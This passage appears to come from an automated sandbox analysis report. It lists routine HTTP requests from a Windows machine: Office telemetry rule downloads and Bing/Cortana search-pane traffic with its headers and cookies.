Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
                                  Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /th?id=OSK.a04da912a9e31e0f7522ec6a00831bb3&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C9kKmwSoBasLkwr9CfsHYGBgYA&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B6wDRpgDjQJgYLYD&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rb/3D/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/ZSlq2MSN0MvVwI58OcghaoHmrE4.css?bu=M-cK4ArtCuAK0QvgCtcL4ArgCuAK4gvgCukL4ArvC-AK9QvgCvsL4Ar_CuAKhQvgCvkK4ArgCsgL4AqUC-AKmgvgCo4L4ArgCqoLrQvgCuAKxQuzC-AKuQu8C-AKpwzgCoEM4AriDA&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=Cc8M4ArgCuAK4ArgCuAK4ArgCg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rb/6h/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AeAK&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rp/3T8ucjQMb8BBehsODJAOjeNJF6s.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rp/9-pklorc79LFfCciVrUdpdbYMSU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=65dc22f5bae44905b431c10cc183a3ed HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
                                  Source: global trafficHTTP traffic detected: GET /apc/trans.gif?b4b2360df62e9cf0666e60a982b91b70 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=0638cfbb5a9041079ce3b71fd1168ee9 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 